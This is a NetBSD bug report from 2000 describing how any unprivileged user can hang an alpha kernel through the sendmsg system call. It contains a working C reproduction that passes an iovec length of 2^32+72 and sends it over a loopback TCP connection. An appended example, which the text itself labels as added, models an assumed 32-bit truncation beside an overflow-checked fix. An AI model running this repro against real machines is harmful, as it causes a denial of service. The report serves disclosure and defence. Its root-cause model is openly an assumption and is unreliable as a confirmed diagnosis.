Subject: kern/10070: sendmsg syscall may hang system on alpha
To: None <gnats-bugs@gnats.netbsd.org>
From: None <weiss@uni-mainz.de>
List: netbsd-bugs
Date: 05/08/2000 05:28:11
>Number: 10070
>Category: kern
>Synopsis: sendmsg syscall may hang system on alpha
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: kern-bug-people
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon May 08 05:29:00 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator: Juergen Weiss
>Release: 1.4.2
>Organization:
Universitaet Mainz
>Environment:
NetBSD netadmin.zdv.Uni-Mainz.DE 1.4.1 NetBSD 1.4.1 (LOCAL) #0: Mon Aug 16 18:27:14 MEST 1999 root@netadmin.zdv.Uni-Mainz.DE:/usr/src/sys/arch/alpha/compile/LOCAL alpha
>Description:
Certain args to the sendmsg system call lead to an infinite
loop in the sosend kernel subroutine. The result is that the system
hangs: the process does not give up control, so no
process switching occurs. Any user can trigger this; no special
privs are required.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <strings.h>
#include <unistd.h>

int
main(void)
{
	int sd;
	struct sockaddr_in addr;
	struct msghdr msg;
	struct iovec msg_iov;
	char buf[1000];

	/* One iovec whose length (2^32 + 72) far exceeds the 1000-byte buffer. */
	bzero(&msg_iov, sizeof(msg_iov));
	msg_iov.iov_base = buf;
	msg_iov.iov_len = 4294967368;
	bzero(&msg, sizeof(msg));
	msg.msg_iov = &msg_iov;
	msg.msg_iovlen = 1;

	/* Any connected TCP socket will do; the loopback ftp port is used here. */
	bzero(&addr, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(21);
	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sd < 0)
		perror("socket err");
	if (connect(sd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
		perror("connect");
	/* On an affected alpha kernel this call never returns. */
	sendmsg(sd, &msg, 0);
	return 0;
}
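The following is an added example and is not part of the PR or of the NetBSD kernel. The repro's iov_len of 4294967368 is 2^32 + 72, which is suggestive on alpha, where size_t is 64 bits and int is 32 bits; whether the 1.4 sosend path really truncates the residual this way is an assumption, the PR only reports the hang. The example models that assumed failure (a 64-bit iovec length accumulated into a 32-bit residual) beside an overflow-checked accounting routine that rejects such an iovec up front. The struct and function names are hypothetical and the types are fixed-width so the behaviour is the same on any host.

```c
/* Added example for PR kern/10070: not NetBSD code, and the 32-bit
 * residual is an assumption about the bug, not something the PR states. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical iovec with a 64-bit length, as on an LP64 machine like alpha. */
struct hyp_iov {
	uint64_t len;
};

/* Naive accounting: accumulate 64-bit lengths into a 32-bit residual.
 * A length of 2^32 + 72 shows up as 72 bytes, while the iovec the send
 * loop will later walk still describes more than four gigabytes. */
int32_t
naive_resid(const struct hyp_iov *iov, int iovlen)
{
	int32_t resid = 0;
	for (int i = 0; i < iovlen; i++)
		resid += (int32_t)(uint32_t)iov[i].len;	/* high 32 bits dropped */
	return resid;
}

/* Checked accounting: refuse any single length, and any running total,
 * that the 32-bit residual cannot represent. Returns 0 and stores the
 * total, or EINVAL, so the byte count the loop trusts always agrees
 * with the iovec it came from. */
int
checked_resid(const struct hyp_iov *iov, int iovlen, int32_t *total)
{
	uint64_t sum = 0;
	if (iovlen < 0)
		return EINVAL;
	for (int i = 0; i < iovlen; i++) {
		if (iov[i].len > (uint64_t)INT32_MAX)
			return EINVAL;
		if (sum > (uint64_t)INT32_MAX - iov[i].len)
			return EINVAL;
		sum += iov[i].len;
	}
	*total = (int32_t)sum;
	return 0;
}

/* Constructed inputs: the single iovec from the repro above, and a sane
 * one sized to the repro's 1000-byte buffer for contrast. */
static const struct hyp_iov repro_iov[1] = { { 4294967368ULL } };
static const struct hyp_iov sane_iov[1] = { { 1000ULL } };

/* Residual the naive accounting computes for the repro iovec (72). */
int32_t
demo_naive_repro(void)
{
	return naive_resid(repro_iov, 1);
}

/* Checked accounting on the repro iovec: EINVAL. */
int
demo_checked_repro(void)
{
	int32_t t = 0;
	return checked_resid(repro_iov, 1, &t);
}

/* Checked accounting on the sane iovec: the total (1000), or -1 on rejection. */
int32_t
demo_checked_sane(void)
{
	int32_t t = 0;
	if (checked_resid(sane_iov, 1, &t) != 0)
		return -1;
	return t;
}

int
main(void)
{
	printf("naive residual for iov_len 4294967368: %d\n", (int)demo_naive_repro());
	printf("checked: repro -> %s, sane -> %d bytes\n",
	    demo_checked_repro() == EINVAL ? "EINVAL" : "accepted",
	    (int)demo_checked_sane());
	return 0;
}
```

The check is deliberately done in the wider type against the limit of the narrower one: comparing `len` with INT32_MAX before adding, and comparing the running sum with `INT32_MAX - len`, means no intermediate value can wrap, which is the property a kernel needs before it derives a loop bound from user-supplied iovec lengths.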
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted: